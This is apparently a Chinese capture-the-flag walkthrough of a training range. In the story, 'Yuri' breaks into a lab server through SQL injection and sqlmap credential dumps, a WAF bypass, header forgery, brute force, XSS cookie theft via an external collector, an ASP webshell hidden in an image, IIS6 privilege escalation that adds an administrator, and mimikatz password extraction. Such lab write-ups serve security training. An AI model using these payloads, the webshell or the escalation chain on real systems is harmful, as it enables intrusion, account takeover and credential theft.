【封神台 - 掌控安全靶场】尤里的复仇 小芳!
第一章:为了女神小芳! SQL注入攻击原理实战演练
一、判断是否存在sql注入漏洞
?id=1’
未正常显示
?id=1 and 1=1
?id=1 and 1=2
页面回显不正常,存在int型注入
二、判断字段数
?id=1 and 1=1 order by 1
?id=1 and 1=1 order by 2
?id=1 and 1=1 order by 3
?id=1 order by 1
?id=1 order by 2
?id=1 order by 3
3回显错误,字段数为2
三、判断回显点
?id=1 and 1=2 union select 1,2
四、正式注入
?id=1 and 1=2 union select 1,version()
5.5.53
?id=1 and 1=2 union select 1,database()
maoshe
数据库
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
admin
查字段
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1
Id
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
username
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
password
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 3,1
无,查出 admin 表里 有 id username password 三个字段
查字段内容
?id=1 and 1=2 union select 1,username from admin limit 0,1
admin
?id=1 and 1=2 union select 1,username from admin limit 1,1
ppt领取微信
?id=1 and 1=2 union select 1,password from admin limit 0,1
hellohack
这就是flag
?id=1 and 1=2 union select 1,password from admin limit 1,1
zkaqbanban
两个用户对两个密码
直观一点做法
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,dirs,news,xss
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
Id,username,password
?id=1 and 1=2 union select 1,
group_concat(id,username,password) from admin
1adminhellohack,2ppt领取微信zkaqbanban
?id=1 and 1=2 union select 1,
group_concat(id,0x40,username,0x3a,password) from admin
1@admin:hellohack,2@ppt领取微信:zkaqbanban
到这里其实已经可以结束了
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='dirs'
paths
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='news'
id,content
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='xss'
id,user,pass
五、sql自动化注入
playload:
python sqlmap.py http://59.63.200.79:8003/?id=1
python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
完整流程:
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1
___
__H__
___ ___[']_____ ___ ___ {1.4.8.10#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:18:23 /2020-08-16/
[17:18:26] [INFO] resuming back-end DBMS 'mysql'
[17:18:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:18:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:18:26] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:18:26 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.4.8.10#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:21:36 /2020-08-16/
[17:21:36] [INFO] resuming back-end DBMS 'mysql'
[17:21:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:37] [INFO] fetching database names
[17:21:37] [INFO] fetching number of databases
[17:21:37] [INFO] resumed: 3
[17:21:37] [INFO] resumed: information_schema
[17:21:37] [INFO] resumed: maoshe
[17:21:37] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] maoshe
[*] test
[17:21:37] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:37 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
___
__H__
___ ___[)]_____ ___ ___ {1.4.8.10#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:21:55 /2020-08-16/
[17:21:55] [INFO] resuming back-end DBMS 'mysql'
[17:21:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:56] [INFO] fetching tables for database: 'maoshe'
[17:21:56] [INFO] fetching number of tables for database 'maoshe'
[17:21:56] [INFO] resumed: 4
[17:21:56] [INFO] resumed: admin
[17:21:56] [INFO] resumed: dirs
[17:21:56] [INFO] resumed: news
[17:21:56] [INFO] resumed: xss
Database: maoshe
[4 tables]
+-------+
| admin |
| dirs |
| news |
| xss |
+-------+
[17:21:56] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:56 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
___
__H__
___ ___[(]_____ ___ ___ {1.4.8.10#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:22:39 /2020-08-16/
[17:22:39] [INFO] resuming back-end DBMS 'mysql'
[17:22:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:22:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:22:39] [INFO] fetching columns for table 'admin' in database 'maoshe'
[17:22:39] [INFO] resumed: 3
[17:22:39] [INFO] resumed: Id
[17:22:39] [INFO] resumed: int(11)
[17:22:39] [INFO] resumed: username
[17:22:39] [INFO] resumed: varchar(11)
[17:22:39] [INFO] resumed: password
[17:22:39] [INFO] resumed: varchar(11)
Database: maoshe
Table: admin
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11) |
+----------+-------------+
[17:22:39] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:22:39 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
___
__H__
___ ___[.]_____ ___ ___ {1.4.8.10#dev}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:23:43 /2020-08-16/
[17:23:43] [INFO] resuming back-end DBMS 'mysql'
[17:23:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:23:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:23:43] [INFO] fetching entries of column(s) 'password, username' for table 'admin' in database 'maoshe'
[17:23:43] [INFO] fetching number of column(s) 'password, username' entries for table 'admin' in database 'maoshe'
[17:23:43] [INFO] resumed: 2
[17:23:43] [INFO] resumed: hellohack
[17:23:43] [INFO] resumed: admin
[17:23:43] [INFO] resumed: zkaqbanban
[17:23:43] [INFO] resumed: ppt领取微信
Database: maoshe
Table: admin
[2 entries]
+----------+------------+
| username | password |
+----------+------------+
| admin | hellohack |
| ppt领取微信 | zkaqbanban |
+----------+------------+
[17:23:43] [INFO] table 'maoshe.admin' dumped to CSV file 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79\dump\maoshe\admin.csv'
[17:23:43] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:23:43 /2020-08-16/
第二章:遇到阻难!绕过WAF过滤!SQL注入攻击原理实战演练
?id=171
?id=171 order by 10
//11 (x)
id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
//waf
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
+代替空格
回显了2、3、7、8、9
Admin表存在,也必须加,否则报错
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
账户admin
密码b9a2a2b5dffb918c
密码md5解密后welcome
登陆后台/admin
zkz{welcome-control}
第三章:这个后台能识别登录者
-
http://59.63.200.79:8004/admin/default.asp
-
http://59.63.200.79:8004/admin123/
对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。
访问者的Curl(host)为:
http://59.63.200.79:81/admin123/sysadmin_view.asp
访问者的Comeurl(referer)为:
http://59.63.200.79:8004/admin123/
- 要点:
访问admin123/sysadmin_view.asp
修改host和referer,使其伪造成内部访问(只需Referer的ip、port和host的ip、port相同)
刷新页面,抓到4个包,最后一个包是我们需要的
端口号都改为81
render
zkz{fuzz-666}
第三章:爆破管理员账户登录后台 burp到支付和暴破实战演练
http://59.63.200.79:8003/dami_zhifu/dami_baopo/index.php
http://59.63.200.79:8003/dami_zhifu/dami_baopo/admin.php
常见用户名没有或被禁用
猜用户名zkaq,对的
bp抓包爆破密码,看长度
账户密码都是zkaq
flag{s_q_gjrm}
第四章:为了更多的权限!留言板!cookie伪造目标权限实战演练
https://xsspt.com/index.php?do=login
<script src = https://xsspt.com/nxqPZY?1597410463> </ script>
cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC;
flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
zkz{xsser-g00d}
第五章:进击!拿到Web最高权限!绕过防护上传木马实战演练
提示:
1,通过修改Cookie登录后台(没用重打)2,上传SHELL!3,Flag在网站根目录(flag.php)3.上传图片时建议上传小文件,我建议用QQ表情
尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,
看到了后台功能!然后要做的,就是找一个上传点,上传自己的外壳了!
之前bp抓包得cookie也行
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
放入cookie
Chrome
Firefox
单击准备好了吗
Microsoft-IIS/6.0
可能存在IIS解析漏洞:
- 目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。
- 文件解析 对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。
- IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx
查看上传目录,和上传文件限制
确定上传目录
其他地方也是这样,提示没有填说明
正确上传点
asp.php
<%eval request ("a")%>
做图片马
copy 1.php + 1.png 2.png
大了好像不行,用了这个小的表情包 ,改文件名为1.cer
萌不萌???
修改文件名为1.cer上传
很难受,一开始找上传的文件在哪,到底是什么文件名。一晚上上传不了,开始没点上传,后来是做的图片马不能上传
重做了新的,上传成功
复制给的上传名,就是带你上传真实时间的那个
zkz{G3t_the_admin!Sh3ll}
第六章:SYSTEM!POWER!webshell控制目标 实战演练
提示:
1,提权!
2,FLAG在C盘根目录下!
尤里嘿嘿笑了起来,简单的Win2003的,只要拿到SYSTEM权限,他就可以向女神小芳炫技去了…
传送门
C
蚁剑虚拟终端没有成功,一直拒绝访问
换了正版的菜刀,选asp,GB2312
刚连上出现的命令
netstat -an | find "ESTABLISHED"
一上来whoami
发生系统错误 5。
拒绝访问。
未提权的虚拟终端
whoami
nt authority\network service
接着要做的是
net user username password /add
此时权限不够
因为cmd需要用到外部接口wscript.shell。
但wscript.shell在C盘,C盘我们仍然无法访问。使用已经组装好的wscript.shell,也就是iis6.exe。
提权命令流程
iis6.exe "whoami"
//this exploit gives you a local system shell 给了system的命令行权限
iis6.exe "whoami"
//再次确认身份和权限
iis6.exe "net user 1 1 /add"
//添加的用户 (账户1 密码1) 其实是在普通用户组中
iis6.exe "net user 1"
//查看用户信息
iis6.exe "net localgroup Administrators 1 /add"
//添加用户到管理员组
tasklist -svc //找到远程桌面服务termservice 即 svchost.exe 2444 TermService 的PID
netstat -ano //通过上面的PID找到端口号
用Windows自带远程桌面连接,访问主机,带上端口号:ip+port。
远程桌面是一个程序,占用了一个端口号。这个端口号其实就是服务软件的端口号,ip表示的是这台服务器电脑,如果想和服务器上的远程桌面服务进行对接,那么肯定要把端口号换成它占用的的端口号
可以直接win+r连
mstsc /v:IP:PORT
或者传统方法
搞错了,再来
其实这里可以上传文件
从右下角回收站打开我的脑子
第七章:GET THE PASS!进程中抓下管理员明文密码
拿到SYSTEM之后,尤里并不满足,他准备通过某种方式拿到服务器管理员密码,用来收集密码信息,以便其他方向的渗透,顺便想将密码发给小芳,用以炫技。
却不曾想,当尤里看到系统的明文密码后。。大吃一惊。。。自此,尤里的人生掀开了新的篇章
文件右键属性,安全,高级,有5行,选择拒绝的两行,编辑,全部清除
密码获取工具mimikatz,直接搜索
privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码
提权
privilege::debug
获取登陆用户密码
sekurlsa::logonPasswords
系统似乎被改了?
解压包密码就是!!!
(我搞了好久好久)
wow!yougotit!
zkz{F3ck_power_3y3stem}
具体的实现过程
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[Try 2 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "net user 1 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net localgroup Administrators 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net localgroup Administrators 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[Try 2 time...]
[Try 3 time...]
[Try 4 time...]
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> tasklist -svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 284 暂缺
csrss.exe 332 暂缺
winlogon.exe 356 暂缺
services.exe 404 Eventlog, PlugPlay
lsass.exe 416 HTTPFilter, PolicyAgent, ProtectedStorage,
SamSs
svchost.exe 608 DcomLaunch
svchost.exe 672 RpcSs
svchost.exe 728 Dhcp, Dnscache
svchost.exe 756 LmHosts, W32Time
svchost.exe 792 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Schedule,
seclogon, SENS, ShellHWDetection, TrkWks,
winmgmt, wuauserv, WZCSVC
spoolsv.exe 952 Spooler
msdtc.exe 980 MSDTC
httpd.exe 1112 Apache2a
svchost.exe 1144 ERSvc
inetinfo.exe 1200 IISADMIN
mysqld.exe 1256 MySQLa
svchost.exe 1960 RemoteRegistry
VGAuthService.exe 2020 VGAuthService
vmtoolsd.exe 2064 VMTools
svchost.exe 2324 W3SVC
svchost.exe 2444 TermService
dllhost.exe 2524 COMSysApp
w3wp.exe 2900 暂缺
wmiprvse.exe 3388 暂缺
logon.scr 3256 暂缺
httpd.exe 852 暂缺
wmiprvse.exe 876 暂缺
cmd.exe 1756 暂缺
tasklist.exe 1744 暂缺
D:\05\UploadFiles\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1112
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:82 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 416
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 980
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1256
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2444
TCP 0.0.0.0:8021 0.0.0.0:0 LISTENING 1112
TCP 127.0.0.1:3306 127.0.0.1:4274 TIME_WAIT 0
TCP 192.168.0.3:82 112.32.5.107:31515 ESTABLISHED 4
TCP 192.168.0.3:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 416
UDP 0.0.0.0:1333 *:* 728
UDP 0.0.0.0:4500 *:* 416
UDP 127.0.0.1:123 *:* 756
UDP 192.168.0.3:123 *:* 756
UDP 192.168.0.3:137 *:* 4
UDP 192.168.0.3:138 *:* 4